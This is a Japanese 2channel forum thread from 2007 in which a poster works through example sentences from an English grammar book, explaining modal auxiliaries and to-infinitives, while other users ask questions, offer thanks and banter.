安藤貞雄『現代英文法講義』(「安藤」と表記)
などを使用します
(文献表記がなくセクション番号「§」だけの見出しは、ロイヤルを指します)。

現在の俺の書式はこんな感じです。
( ):省略可能。[ ]:前の語句と入れ替え可能。
< >:名詞要素。{ }:形容詞要素。(( )):副詞要素。
S:主語。V:動詞。O:目的語。C:補語。A:付加語、義務的副詞。M2:副詞要素

723 :勝手口 ◆KatteG.R4k :2007/01/31(水) 22:54:19
前の方残ってるけど、祝!350突破!

>>711
一応、ほぼ日刊でアップしてますが、鯖の調子が悪いみたいですね。
>>718
黄色い『表現のための実践ロイヤル英文法』はもってません。
ちょっと立ち読みしたんですけど、特徴がよくわかりませんでした。
>>721>>722
フォローありがとうございます。


350.(助動詞:祈願を表す may)
May / S / come / C! (文型:S V C)

「祈願を表す may」で、文語/格式体として有名でしょう。
文頭だけでなく、hope や pray の後の that節内で使われることもあります。
I hope that the young couple may enjoy many years of happiness together.(『PEU』§341)
該当箇所:
「§199 may, might の用法、[1] may の用法、(4) 祈願」
参考:
「§268 願望を表す構文、(1) 仮定法現在」

724 :勝手口 ◆KatteG.R4k :2007/01/31(水) 22:55:14
351.(助動詞:may well)
S / may ((well)) feel / C / M2((this morning)), // (文型:S V C)
for // S / were / A((up)) M2((all night long)). (文型:S V A)

may well は、2つの用法に分けることができます。
(1)「たぶん〜だろう」(may 単独よりも確信度が高い)
 (may は「推量」、well は可能性を補強する役割)
(2)「〜するのももっともだ/〜するのも無理はない」
 (may は「可能/容認」、well は「十分の根拠をもって」)(『英文法詳解』p.345 参照)
「may very well」のように very がつく場合もあり、また may 以外の法助動詞を使うこともあります。
該当箇所:
「§199 may, might の用法、[1]-(8) may を用いた慣用表現、【1】〈may well 〜〉」
(『英文法講義の実況中継』「熟語の講義(1)」参照)

725 :383改め384:2007/01/31(水) 23:05:11
350突破!おめでとうございます。
鈴木長十、伊藤和夫 両先生も喜んでいらっしゃることでしょう。

726 : ◆IuJiIQCtrs :2007/01/31(水) 23:27:48
ジーニアスは阪神びいき
ttp://www.youtube.com/watch?v=fI1TRPMWG0k

727 :名無しさん@英語勉強中:2007/02/01(木) 00:43:14
ロイヤル!ロイヤル!

728 :勝手口 ◆KatteG.R4k :2007/02/01(木) 22:31:42
>>726
これ有名ですよね。
http://www.taishukan.co.jp/gcdroom/gcd_tsuushin/gcd_tsuushin38.html
の「<コラム1> 用例よもやま話――『ジーニアス和英辞典』は阪神びいき??」
によると、「ジャイアンツが首位を走っている用例もある」そうです。どこだろ?


352.(助動詞:may as well...as)
S / may ((as well)) not know / O / M2((at all)), / ((as v x)). (文型:S V O)

as節内は、know / O / M2((but imperfectly)) (文型:(S) V O)(but=only)

may as well...as は、マイナスの事柄を2つならべて、
消極的に「〜するのは〜するのと同じだ」「〜するくらいなら〜したほうがましだ」といった意味を表します。
該当箇所:
「§199 may, might の用法、[1]-(8) may を用いた慣用表現、【3】〈may [might] as well 〜 as …〉」
(『英文法講義の実況中継』「熟語の講義(2)」参照)

not の位置に注意が必要ですね。「not...at all」については以下を参照。
該当箇所:
「§386 強意語句による強調、[4] 否定の意味の強調」
「§372 強い否定と弱い否定、[2] 強い否定、(1) never、[注]never が不適切な場合」

なお、実際には、後半の as節のない「may as well」の形がよく使われます。
比較対象が書いてなくても「何と比較しているのか」を考えるのが、比較の基本ですよね。
「このままの状態だと何もプラスはないから、〜する方がましかな」といった意味(弱い助言)になります。
該当箇所:
「§199 may, might の用法、[1]-(8) may を用いた慣用表現、【2】〈may [might] as well 〜〉」

729 :勝手口 ◆KatteG.R4k :2007/02/01(木) 22:32:46
353.(助動詞:might as well...as)
S / might ((as well)) throw / O / A((away)) / ((as v x)). (文型:S V O A)

as節内は、lend / O / A((to O)) (文型:(S) V O A)

例文352と同様ですが、完全な「たとえ話」であれば might を使います。
比較するのは、どちらもかなりマイナスな事柄になります。
該当箇所:
「§199 may, might の用法、[1]-(8) may を用いた慣用表現、【3】-[参考]」

730 : ◆IuJiIQCtrs :2007/02/01(木) 22:56:16
>>728
ここに書かれてますよ。
ttp://serendipper.cocolog-nifty.com/blog/2005/08/post_facd.html

731 :勝手口 ◆KatteG.R4k :2007/02/01(木) 23:39:57
>>730
ありがとうございます。
研究社のアンチ巨人っていうのも面白いですね。

732 :勝手口 ◆KatteG.R4k :2007/02/02(金) 23:00:18
354.(助動詞:禁止を表す must not)
S / must not park / O / A((there)) / M2((without O)). (文型:S V O A)

must は「(話し手の主観的な)義務」を表します。
must not は、「〜しないこと」が「義務」となり、「禁止」を意味します(江川 p.300)。
該当箇所:
「§200 must の用法、(1) 義務・強要/(2) 禁止」
(『英文法をこわす』p.31 参照)

なお、マイナーですが、park の過去分詞 parked は、done や gone のように
「自動詞の完了」として使われる場合があるので注意が必要です(例文470参照)。
「Where are you parked?」を受動態と勘違いしないようにしましょう。
(1) I am parked over there. (be動詞+自動詞の完了を表す過去分詞)
(2) My car is parked over there. (他動詞の受動態)
参考:
「§186 現在完了 (Present Perfect)、(6)〈be+過去分詞〉の完了形」
(ついでですが、mistaken も要注意です)

733 :勝手口 ◆KatteG.R4k :2007/02/02(金) 23:01:10
355.(助動詞:推量を表す must)
S / must be / ((very)) C. (文型:S V C)
S / studies / M2. (文型:S V)

must が話し手の推量を表す場合、確信度がかなり高く、
「〜にちがいない」「〜に決まっている」といった意味を表します。
該当箇所:
「§200 must の用法、(5) 推量」

後半の副詞要素のところは、「((as)) long ((as five hours))」という原級比較ですが、
「as long as...」で「〜もの長い間」と考えても良いと思います。

734 :勝手口 ◆KatteG.R4k :2007/02/02(金) 23:02:11
356.(助動詞:過去の推量を表す must+完了形)
S / looked / ((so)) C // (文型:S V C)(so...that の呼応)
that // S / thought / <(that) s v x>. (文型:S V O)

thought の目的語の that節内は、S / must have happened / A((to O)) (文型:S V A)

「must+完了形」は、主に2つの用法があります。この例文では(1)です。
(1)「〜だったにちがいない」という過去の事柄に対する確信度の高い推測
(2)「義務」+「完了」で、「(〜までに)〜しておかなければならない」(安藤 pp.310-311, p.339)
該当箇所:
「§200 must の用法、(5) 推量、【2】〈must have+過去分詞〉」

この例文では、looked と thought が同じ過去の事柄で、have happened がそれより昔の事柄になります。
なお、must には過去形がないので、従属節内では、時制の一致と関係なく must のままになっています。
参考:
「§200 must の用法、(1)-[注]must と時制」
(『英語の不思議再発見』p.215 参照)

「something {←wonderful}」の語順については以下を参照。
該当箇所:
「§118 形容詞の位置と語順、[2] 名詞の後に置かれる形容詞」

735 :名無しさん@英語勉強中:2007/02/03(土) 00:11:09
あっち側のスレ(TOEIC高得点には〜)がdat落ちしたようです。

736 :名無しさん@英語勉強中:2007/02/03(土) 00:21:54
>>734
いつも丁寧な解説見させてもらってます。
勝手口さんがやってる文法的な解説ならなんとか自分で調べながらもできそうなんですが
出口さんのやった品詞分解に関しては「副詞の位置がなんでここにきて〜」みたいなのまで追求していくってことですよね?
そうすると薬袋って人の本を理解しないとできそうにないし…。

ほんとに英語できるようになりたいんですけど、この本をどうやって使ってあげれば応えてくれるのでしょうか。

737 :名無しさん@英語勉強中:2007/02/03(土) 03:57:16
>>736
英文の組み立てを理解したらCDを聴きながら音読なりシャドウイングなりしてあげればいいんじゃない。

738 :名無しさん@英語勉強中:2007/02/03(土) 05:52:26
mustは助動詞の過去形だって事実をみなさん意外にわすれがち。

助動詞過去形が絡んだ話でmustが出てもギョッとしないように。
Don't let me say you must have known that.

739 :383改め384:2007/02/03(土) 13:17:36
>>736
解決できない項目は 教えて!goo で質問してみては?
出口さんのまとめサイト(雑談掲示板)でも紹介されています。
一緒にがんばっていきましょう!

740 :勝手口 ◆KatteG.R4k :2007/02/04(日) 23:11:09
>>736
語順や副詞の位置については、学校英語ではきちんと扱わないので難しいですよね。
薬袋さんの本は読んだことがないのですが、そういった点まで扱っているなら読んでみたいですね。
副詞の分類と位置に関しては、
『現代英文法講義』「§25.4. 副詞の階層性と配置」(安藤 p.536)の整理が面白いと思います。


357.(助動詞:強調の do)
S / do hope / <(that) s v x>. (文型:S V O)

「強調のdo」です。3単現なら does を、過去形なら did を使い、本動詞は原型になります。
該当箇所:
「§212 do の用法、(3) 強調」
「§384 doを用いた強調、(1) 平叙文の場合」

that節内は、
S / shall be able to enter / O / M2((this time)) // (文型:S V O)
and // (shall be able to) enjoy / O (文型:(S) V O)

741 :勝手口 ◆KatteG.R4k :2007/02/04(日) 23:12:17
358.(助動詞:過去の事柄の必要性を否定する need not+完了形)
S / need not have come / M2((all the way→)) A((from O)). (文型:S V A)

否定文/疑問文の場合、need を助動詞として用いる場合があります(ただし稀です)。
助動詞の need には過去形はありませんので、must と同様、時制の一致が起きません
(本動詞の need は、平叙文でも使うし、過去形もあります)。

で、「need not+完了形」は、過去の事柄に関して「〜する必要なかったのに(しちゃった)」を表します。
「should+完了形」と同様の考え方です(例文335参照)。
該当箇所:
「§208 need の用法、(2) 過去のことについて言う場合、【2】〈need not have+過去分詞〉」

742 :勝手口 ◆KatteG.R4k :2007/02/05(月) 22:36:23
359.(助動詞:had better)
S / had better encourage / O / to v x. (文型:S V O to do)

had better は、仮定法に由来する表現ですが、熟語的な助動詞と考えた方がわかりやすいでしょう。
単なる「提案」ではなく「警告」「命令」「脅迫」を意味する、というのは有名ですね。
該当箇所:
「§213 to不定詞と原形不定詞、[2] 原形不定詞、【4】 慣用表現」
「§230 原形不定詞を用いた慣用構文、(1)〈had better+原形不定詞〉」
「§270 仮定法を含む慣用表現、[4]-(2) 〜had better」
下記サイトも参照。
ttp://www.kirihara-kyoiku.net/peripatos/03/05.html

to不定詞のところは、form / O / M2((at O)) (文型:(S) V O)
habit of reading の of は「同格の of」。「habit of doing」で「〜する習慣」となります(例文132参照)。

743 :勝手口 ◆KatteG.R4k :2007/02/05(月) 22:37:52
360.(助動詞:had best)
M2((In order to v x)), / S / had best go / A((to O {←where s v x})). (文型:S V A)

to不定詞のところは、master / O (文型:(S) V O)

where節のところは、
It (=The language) is spoken in the country. (文型:S V C)(受動態)
ってな形からの変形。

「had better」からの派生で「had best」もあります。
とくに差はないらしいので、無理に「〜するのが一番だ」などと訳す必要はなさそうです(江川 p.338。安藤 p.371)
(米語ネイティブに尋ねたら、どっちも変わらず unfriendly だ、と言ってました)。
該当箇所:
「§230 原形不定詞を用いた慣用構文、(1)〈had better+原形不定詞〉、【4】 had best」

744 :名無しさん@英語勉強中:2007/02/05(月) 23:30:50
毎日5963です。
>>742
へぇ、had betterは仮定法に由来するんだ。知らんかった。

745 :名無しさん@英語勉強中:2007/02/06(火) 13:05:53
hadだからねぇ。普通にがんがえれば...

746 :勝手口 ◆KatteG.R4k :2007/02/06(火) 23:08:15
>>744
どの助動詞も、もともとは本動詞の過去形(仮定法)だったらしいですけどね。


361.(助動詞:義務を表す ought to)
S / ought not to say / O / M2((in public)). (文型:S V O)

ought は、通常 to不定詞とともに用いるという点で例外的な助動詞です
(ought to で、熟語的な助動詞と考えても良いと思います)。
意味は should とほぼ同じです。
一応区別すると、should が主観的なのに対して、客観的・状況的な義務を表すといった特徴があります
(一般的に、1語の法助動詞は主観的、to不定詞を使う熟語的助動詞は客観的、と言えます)。
否定形は「ought not to」が標準形です。
該当箇所:
「§202 ought to の用法、(1) 義務」

747 :勝手口 ◆KatteG.R4k :2007/02/06(火) 23:09:00
362.(助動詞:「当然」+「完了」を表す ought to+完了形)
S / ought to have arrived / M2((by now)), M2((as s v x)). (文型:S V)

as節内は、S / told / O1 / M2((by phone)) / O2<that s v x> (文型:S V O O)
that節内は、S / would leave / O / M2((at nine in the morning)) (文型:S V O)

「ought to+完了形」は、「should+完了形」と同じように、主に以下の用法があります(例文335参照)。
(1)「実現しなかった過去の義務」
(2)「実現しなかった過去の当然」
(3)「当然」+「完了」
該当箇所:
「§202 ought to の用法、(2) 推量・当然、【2】 推量の〈ought to have+過去分詞〉」

748 :名無しさん@英語勉強中:2007/02/06(火) 23:41:38
had better が脅迫のニュアンス持つって知らなかった…
ありがとうございます。

ふつうは can あたりを使うのがいいね。

749 :名無しさん@英語勉強中:2007/02/07(水) 21:21:13
>>748
適当な事書かないでくれる?
君ぐらいの厨房が鵜呑みにするといけないから

750 :名無しさん@英語勉強中:2007/02/07(水) 22:29:44
            ∩_
           〈〈〈 ヽ
          〈⊃  }
   ∩___∩  |   |
   | ノ      ヽ !   !
  /  ●   ● |  /
  |    ( _●_)  ミ/ <こいつ最高にアホ
 彡、   |∪|  /
/ __  ヽノ /
(___)   /

751 :勝手口 ◆KatteG.R4k :2007/02/07(水) 22:36:29
>>748
>had better が脅迫のニュアンス持つって知らなかった…
「You had better go home.」はどんなニュアンスか?って、米語ネイティブに聞いてみたんですけど、
「バーテンが、酔っ払ってケンカを始めた客の胸ぐら掴んで言う感じ」
って答えたのが、ちょっと面白かったです。


363.(助動詞:過去の習慣的な動作を表す used to)
S / used to get ((up)) / M2((early)) // (文型:S V)
and // take / <an...walk> / M2((before O)). (文型:(S) V O)(並列構造:used to (1)get and (2)take)

used to は、熟語的な助動詞で、現在は終わっている「過去の習慣的動作/継続的状態」を表します。
「現在は違う」という意味が必ず含まれ、「used to ..., but now...」といった形でよく使われます。
具体的な期間を示す副詞語句(「for two years」(2年間)など)と共に用いることはできません
(江川 p.311。『英文法詳解』p.368)。
なお、否定形は、「didn't used to / didn't use to / usedn't to」などがありますが、
「never used to」が一番よく使われます(『PEU』§604)。
該当箇所:
「§203 used to の用法、(1) 過去の習慣的な動作」
「§205 would の用法、(1) 過去の習慣、[注]used to と would の違い」(例文330参照)

752 :勝手口 ◆KatteG.R4k :2007/02/07(水) 22:39:09
364.(助動詞:過去の継続的な状態を表す used to)
There / used to be / S / A((about here)). (文型:There V S A[C])
Don't / you / know / <where s v>? (文型:S V O)(否定疑問文)

used to は、would とは異なり、状態動詞にも使うことができます。
また、used to はモノを主語にできますが、would は人しか主語にできません(安藤 p.319)。
該当箇所:
「§203 used to の用法、(2) 過去の継続的な状態」

なお、後半の文が否定疑問文になっていますが、
この部分は、「英語が不適切」もしくは「誤訳」ではないかと思います。
否定疑問文は、主に2つの意味で使われます。
 (1)「確認」「提案」(〜しないの?→たしか〜するはずだよね/当然するでしょ)(例文255、328参照)
 (2)「驚き」「いらだち」(〜しないの?→ありえねー!)
で、この例文の場合、
(1)だとすると、「今どこにあるか知ってますよね?」(2人の関係がよくわからない)
(2)だとすると、「今どこにあるか知らないってのか?」(状況がよくわからない)
いずれにしても、特殊な状況で、訳例のような普通の会話ではなさそうです。
訳例のような会話であれば、否定疑問文にする必要はなく、普通の疑問文で良いと思います。
「日本語の否定疑問文」は丁寧な表現として使うことができますが、
それに引きずられて「英語の否定疑問文」を使うと間違えてしまうので注意しましょう。
参考:
「§29 疑問文、[3] 疑問文の種類、(1)-【2】否定の疑問文」

753 :名無しさん@英語勉強中:2007/02/07(水) 23:00:22
           ___
          ./    \
          .| ^   ^ |
          | .>ノ(、_, )ヽ、.|   < You had better make me angry anymore.
         __! ! -=ニ=- ノ!__  (あまり私を怒らせない方がいい)
    /´ ̄ ̄ .|\`ニニ´/    `ヽ
   {      .|__  ̄ ̄ヾ      }
   i;;',,,  r---イ     /|,、_,,  ,',;:',i
   .l;';',;,,  }  /;\     / ヽ / ,;,;;',;l
   .|;;',;,   } ./;;;,, \   / ;;;;;;ヽ ,,;;','i
   i;',,   / /;;,',';;  ノ--, ',',;;::',',゙i ,,';';i
   i;,';  /./,',',';;" /   \ ',',',;;,'i ,;',i
  /  / i 、  /    ヽ ',;::'、|  \
 ヽヽヽヾ丿  〈       ヽ''  {////
  ```` ト,   i        | 、 i´´´
      |',',;;  }        ! ',',;;i
      |,','、 /        ヽ',',','|
      !;;', /          !,',;,;'|
       !'' {           }'' !.
     /  i,           〉 ヽ.、
    彡、,,,-‐┘         └ュュュュ

754 :勝手口 ◆KatteG.R4k :2007/02/07(水) 23:38:49
had better not じゃないかと...

さて、
B-4の助動詞(例文366まで)が終わった後ですが、(1)続き、(2)前の方で空いてるとこ、
どっちが良いと思いますか?

そのまま先に進めてもいいんですが、
西川口さんや他の解説者の人がしばらく現れなさそうなので、
前の方を埋めていってもいいかな、と思ってます。
ご意見あればよろしくお願いします。

755 :名無しさん@英語勉強中:2007/02/08(木) 00:09:32
>>754
わかりやすい解説、いつもありがとうございます。
(2)前の方で空いてるとこ お願いします!

ホントハ 1〜700 マデ スベテ 勝手口さん ノ 解説 ホシイッス

756 :名無しさん@英語勉強中:2007/02/08(木) 00:13:56
難しそうなところから解説してほしいなあ。
個人的には次の「不定詞」を解説してから、前の方を埋めてもらえるとありがたいです。

757 :名無しさん@英語勉強中:2007/02/08(木) 00:22:42
毎日お疲れ様です。
当を得た解説で、いつも勉強させてもらっています。

364の否定疑問文の不自然さも指摘されるまでわかりませんでした。
手元の参考書で一番詳しいのはFORESTなんですが、同様の解説でした。

進め方ですが、あんまり章をとばしたりするとどこが終わってないか
わかりにくくないです?
とか言いつつ僕も「否定」で解説してほしい文があったりするんですが。

758 :名無しさん@英語勉強中:2007/02/08(木) 01:43:40
>>754
1の続きをお願いします。
後半の方が重要な文法事項を含んでいるので。
前半は文型が中心ですし。後回しでも構わないと思います。

759 : ◆IuJiIQCtrs :2007/02/08(木) 05:13:50
>>757
的は射るものだろw

>>754
勝手口氏が重要だと思うところ、解説のしがいがあるところ優先で良いのでは?
それが誰もが納得のいく形だと思いますけど。

西川口氏も見てたら連絡くださいよ。


760 : ◆IuJiIQCtrs :2007/02/08(木) 05:16:35
>>757
すまん。>>759の訂正。当を得ただったorz
寝ぼけて書くもんじゃないなw

761 :名無しさん@英語勉強中:2007/02/08(木) 10:39:25
これだからエロは……

762 :名無しさん@英語勉強中:2007/02/08(木) 11:28:49
前から先にやった方が、いいと思います。

763 :名無しさん@英語勉強中:2007/02/08(木) 12:06:28
他の人の復帰手段を断つこともない
今のまま続きを

764 :名無しさん@英語勉強中:2007/02/08(木) 20:50:20
>>760
的を射る、だろ?
貴様みたいなカスがくるとまた荒れるから早く消えろ。

765 :名無しさん@英語勉強中:2007/02/08(木) 20:53:06
>>764のレスは的を射てないな

766 :593:2007/02/08(木) 21:00:47
754>>勝手口氏の好きなところが良いと思います。
個人的には、B−5不定詞を終ってから、前の開いてるとこの解説をして欲しいです。






767 :名無しさん@英語勉強中:2007/02/08(木) 21:01:37
公開トリップに切れるなよw

勝手口さんのやりたいようにやっていって下さい。

768 :名無しさん@英語勉強中:2007/02/08(木) 21:49:50
質問なのですが、勝手口氏の解説中にでてくる、 s v x のxって何ですか?
v xで出口氏のサイトのXですか?

769 :勝手口 ◆KatteG.R4k :2007/02/08(木) 22:43:22
みなさん、ありがとうございます。
こんなに反応があるとは思ってなかったので、びっくりです。
いろいろな意見があって難しいところですが、
とりあえずは続きの「不定詞」のところを進めていこうと思います。
今後もよろしくお願いいたします。

>>768
>質問なのですが、勝手口氏の解説中にでてくる、 s v x のxって何ですか?
>v xで出口氏のサイトのXですか?
いえ、出口さんのものとは別のものでして、
「主語+動詞+いろんなもの」という未知数の意味で使ってます。
一度に書くと煩雑になるので、とりあえず「ここは文になってますよ」ということだけを示して、
その後、個別にその部分の文型を示しています。

770 :勝手口 ◆KatteG.R4k :2007/02/08(木) 22:44:25
365.(助動詞:義務を表す have to)
S / don't have to worry, / M2((since s v x)). (文型:S V)

since節内は、S / have / nothing {to do with O} (文型:S V O)
(例文311参照)

have to は、熟語的な助動詞で、must とほぼ同じ意味です(ただし、この have は通常は本動詞)。
一応区別すると、must が話し手の主観的な義務/必然性を表すのに対して、
have to は客観的・状況的な義務/必然性を表します(例文361の説明参照)。
イギリス英語では「have got to」という形もあります(ただし、1回限りの義務の場合。この場合 have は助動詞)。
該当箇所:
「§201 have to の用法、(1) 義務」
「§201 have to の用法、(1) 義務、[注]2. must と have to の違い」
「§169 be, do, have の用法、[3] have の用法、(3) 慣用表現、【1】 have to 〜」

否定文の「don't have to」は、「have to ではない」ということで「不必要」を表します。
「禁止」を表す「must not」とは異なります(例文354参照)。not の作用域に注目しましょう。
「§201 have to の用法、(1) 義務、【2】 don't have to」
「§200 must の用法、(2) 禁止、[注]must not と don't have to」

771 :勝手口 ◆KatteG.R4k :2007/02/08(木) 22:45:24
366.(助動詞:have only to)
M2((In order to v o)), / S / have ((only)) to travel / M2((with O)) / M2((for O)). (文型:S V)
【直訳風】「ある人を知るためには、あなたは、その人と一緒に1週間旅行するだけでいい」

have only to は、「have to」に only がついたもので、限定的な義務を表します。
「only have to」の形もあります。というか、こっちの方が普通かもしれません。
また、「just have to」「have just to」など only 以外の副詞も使われます。
該当箇所:
「§169 be, do, have の用法、[3] have の用法、(3) 慣用表現、【2】 have only to 〜」

772 :名無しさん@英語勉強中:2007/02/09(金) 00:29:50
自称英語通のエロが現れるだけですぐ雰囲気が悪くなるね

773 :名無しさん@英語勉強中:2007/02/09(金) 06:50:42
おまえも釣りが好きだなw

>公開トリップに切れるなよw

774 :勝手口 ◆KatteG.R4k :2007/02/09(金) 22:32:12
ということで、「B-5 不定詞」に進みます。


367.(to不定詞:完了不定詞、不定詞の否定形)
It / is / C / to v, // (文型:S V C)(形式主語のit:真主語がto不定詞)
but // it / is / C / never to v x. (文型:S V C)(形式主語のit:真主語がto不定詞)

後半の文の to不定詞のところは、have tried / to v (文型:(S) V to do)

不定詞の否定形は、不定詞の直前に not などの否定語をつけます。
該当箇所:
「§216 不定詞の否定形と分離不定詞、[1] 不定詞の否定形」

完了不定詞((to) have 過去分詞)は、主文よりも昔の事柄を表します
また、主文の時点までの「完了」を表す場合もあります。
該当箇所:
「§214 不定詞の完了形」
「§228 不定詞の表す時、[2] 完了形の不定詞の表す時」

この例文の出典は、セオドア・ルーズベルト大統領の演説(1899年)でした。

775 :勝手口 ◆KatteG.R4k :2007/02/09(金) 22:33:03
368.(to不定詞:代不定詞)
S / insisted / A((on O)), / M2((though s v x)) (文型:S V A)

though節内は、S / told / O / not to (climb O) (文型:S V O to do)

「動詞+いろんなもの」を繰り返すのが面倒なとき、
該当部分が to不定詞であれば、to だけ残して後は省略することがあります
(to不定詞じゃなければ、do/be動詞/助動詞を使います。例文313参照)。
該当箇所:
「§213 to不定詞と原形不定詞、[4] 代不定詞」
「§382 共通要素の省略と共通構文、[1] 共通要素の省略、(2) その他の共通部分の省略」
参考:
「§212 do の用法、(5) 代動詞」

776 :名無しさん@英語勉強中:2007/02/09(金) 22:51:12
>>775
s v x のxの意味わかりました、ありがとうございました。
一気に4個解説ですか、かっこいいっすよ。


777 :名無しさん@英語勉強中:2007/02/10(土) 11:21:58
>>775
To be or not to beみたいなときもあるけど、不定詞部分を省略する時としない時は
何が違うのでしょうか?

778 :西川口 ◆Im4lkGa4xk :2007/02/10(土) 11:51:46
なぜかわからないんですが、ずーっと、2chが読めなくなってます。
今、ひとのPCを勝手に使って、書いてます。
過去ログ読むと、心配してくれているひともいて、泣けてきました。
しばらく休憩になってしまいそうです。申し訳ありません。

>>勝手口さん
もう、あなたの背中が見えなくなってしまいました。
俺のことは気にせず、好きなところを解説してください。

779 :名無しさん@英語勉強中:2007/02/10(土) 14:00:47
>>778サーバー移転のせいだと思う。
でも、この発言も西川口氏に届かないんだな。

780 :名無しさん@英語勉強中:2007/02/10(土) 15:17:09
>>779
専ブラなら移転にも対応できるはずだし。
PCブラウザでお気に入りからなら、検索し直せばいいだけ。
でも、サーバー移転後にも書いてるから違うんじゃね?

PCブラウザで閲覧して人多杉状態なんじゃ。
まさかVIPで規制なんてあるまいし。

781 :名無しさん@英語勉強中:2007/02/10(土) 18:26:33
>>778
もし見てたらどういう表示が出て読めなくなるのか書いてみるといい

782 : ◆IuJiIQCtrs :2007/02/10(土) 23:22:27
>>778
携帯とPCで共有可能
ttp://p2.2ch.net/

携帯用アプリ
ttp://imona.net/
ttp://skullysoft.sytes.net/w2chssinfo/
ttp://s2f.jp/gikolet/

携帯のブラウザから利用
ttp://u.la/
ttp://s.s2ch.net/
ttp://jmobile.ddo.jp/
ttp://2chs.net/orz/
ttp://mobile.seisyun.net/

AU用FLASH
ttp://www.grand-wazoo.com/andy/

783 :勝手口 ◆KatteG.R4k :2007/02/10(土) 23:47:41
>>777
内容的には特に違いはないと思いますが、厳密なルールは俺にもわかりません。
文法書の記述を要約すれば、
代不定詞を用いるのは、(1)会話文で、(2)繰り返すのが冗長だと話し手が感じるとき、となります。
『ハムレット』のセリフに関しては、(1)厳密な「会話文」ではない、(2)冗長と感じるほどではない、
さらに、語調の関係(韻を踏む)といった要因があるかと思います。

また、代不定詞が頻繁に使われるようになったのは、19世紀半ば以降のことらしく、
『ハムレット』が書かれた1600年頃には、まだ確立していなかったのかもしれません。
ttp://www5c.biglobe.ne.jp/~jesazuma/infinitive.htm

>>778
事情がわかり安心しました。
専ブラ使えばいけるのではないかと思います。復活お待ちしてますよ。

784 :勝手口 ◆KatteG.R4k :2007/02/10(土) 23:50:19
369.(to不定詞:疑問詞+to不定詞[wh to do])
S / could not make ((up)) / O / A(( (about) <whom to v x>)). (文型:S V O A)
あるいは、
S / could not make up my mind / <whom to v x>. (文型:S V O)

make up one's mind / make one's mind up は、「決心する、決断を下す」といった意味で、
about句/as to句、to不定詞、that節、wh節、wh to do、などが後ろにきます。
単なる名詞であれば前置詞がつきますが、to不定詞やthat節では前置詞がつけられず、
wh節、wh to do では前置詞がつかないこともあります。
「be+形容詞+前置詞句」と「be+形容詞+that節」の関係なんかと同じです(例文151参照)。
「make up one's mind / make one's mind up」を「熟語」としてとらえるのも良いと思います。

「疑問詞+to不定詞」は、「〜するべきか」という意味の名詞句になります。
疑問文を圧縮したものと考えると良いと思います(安藤 p.177 参照)。
なお、why だけは、通常は to不定詞ではなく原型不定詞がきます。
該当箇所:
「§220 〈疑問詞+to不定詞〉」
参考:
「§389 複文と単文の転換、[1] 名詞節を含む複文と単文との転換、(5) 疑問詞節⇔〈疑問詞+to不定詞〉」
「§20 名詞句、(1) 不定詞を用いる名詞句」

whom+to不定詞は、
I / send / someone / M2((on my behalf)). (文型:S V O)
ってな形からの変形。
cf. Whom/Who should I send?

785 :名無しさん@英語勉強中:2007/02/11(日) 00:22:37
>>634
> 出典は Frances Hodgson Burnett の『Little Lord Fauntleroy(小公子)』(1886年)でした。
>>774
> この例文の出典は、セオドア・ルーズベルト大統領の演説(1899年)でした。

出典がわかるなんて、勝手口さんは英語にそうとうお詳しいのでは。

身近にネイティブの方がいらっしゃるそうですし、
推測するにこんな↓プロフィール?
30代後半・男性・関東在住・研究職

786 :名無しさん@英語勉強中:2007/02/11(日) 00:36:16
>>784
>  なお、why だけは、通常は to不定詞ではなく原型不定詞がきます。
>  該当箇所:
>  「§220 〈疑問詞+to不定詞〉」

これがちょっとわからないんですが、具体的な例文を作ると
I don't know why come.
とかになるんでしょうか。

私の手元には網羅的な文法書がないもんでして、FOREST 4thを参照すると
P181「×why to ... 疑問詞のうち、whyは不定詞の直前に置くことはできない。つまり、×<why to 不定詞>という形はない。」
としか書かれていません。

787 :名無しさん@英語勉強中:2007/02/11(日) 00:39:45
>>785
ネットストーカーキモイよ

788 :名無しさん@英語勉強中:2007/02/11(日) 02:22:56
>>785
余計な詮策はするな。消されるぞ。

789 : ◆IuJiIQCtrs :2007/02/11(日) 05:34:15
>>778
人多杉対策に専ブラ
ttp://www.monazilla.org/

通常のPCブラウザでなら
ttp://oo.2ch2.net/menu

790 :名無しさん@英語勉強中:2007/02/11(日) 15:20:42
例文397の
for anyoneの部分をfor everyoneに変えると、
「彼の話はあまりにもばかげていたので全員が信じるには至らなかった。」
みたいな文になりますか? レベルの低い質問ですみません。

791 :名無しさん@英語勉強中:2007/02/11(日) 22:38:51
>>790
それって英語力よりも、あなたの頭に問題あり。
それは、あまりにも馬鹿げた話を大部分の人が信じたってことになるぞw

792 :名無しさん@英語勉強中:2007/02/11(日) 22:44:35
あまりにもばかげていたので(理由)

大部分が信じた(結果)

793 :名無しさん@英語勉強中:2007/02/12(月) 07:41:58
>>791-792
どうして肯定になるのかなwwwwwww

>>791 was too ridiculous.
ばかばかし過ぎる。

>>791 was too ridiculous to believe.
ばかばかし過ぎる/しんじるにはね。

>>791 was too ridiculous for anyone to believe.
ばかばかし過ぎる/誰もが(誰であってもいいけどそいつが)信じるにはね。
=ばかばかし過ぎて誰も信じなかった。

>>791 was too ridiculous for anyone to believe.
ばかばかし過ぎる/みんなが(各人1人1人がみな)信じるにはね。
=ばかばかし過ぎてみんな信じなかった。

>>791 was too ridiculous for all to believe.
ばかばかし過ぎる/みんな(集団として全員が)信じるにはね。
=ばかばかし過ぎてみんな信じなかった。

>>790 any/every/allの違いを扱った書籍を読んでみた方がいい。

794 :名無しさん@英語勉強中:2007/02/12(月) 07:46:14
>>>791 was too ridiculous for ×anyone○everyone to believe.
>ばかばかし過ぎる/みんなが(各人1人1人がみな)信じるにはね。

コピペが丸分かりorz...

795 :名無しさん@英語勉強中:2007/02/12(月) 07:58:34
>>793
全員が信じるには至らない↓
全員とは言えないまでも、それなりの人数が信じた

796 :名無しさん@英語勉強中:2007/02/12(月) 15:23:27
あれ??まとめサイト見れない・・・orz

797 :江口 ◆IuJiIQCtrs :2007/02/12(月) 16:04:07
また自演か

798 :ミエロ ◆IuJiIQCtrs :2007/02/12(月) 16:55:52
エロ帰ってこい

799 :勝手口 ◆KatteG.R4k :2007/02/12(月) 18:20:25
>>777
>>783の補足です。
代不定詞を用いる場合でも、be動詞の場合には、「to be」を残すのが普通だそうです(『Forest 第4版』 p.182)。
(文法まとめサイトの管理人さん、上の行を例文368の説明に加えておいていただけますか)

>>786
不正確な理解で誤解をまねく書き方をしてしまいました。すいません。
調べてみた結果、実践的な指針としては、
「why の場合、<why+to不定詞> は誤用なので、完全な間接疑問文 <why s v x> を使う」
ということになると思います。以下、へたれな考察です。

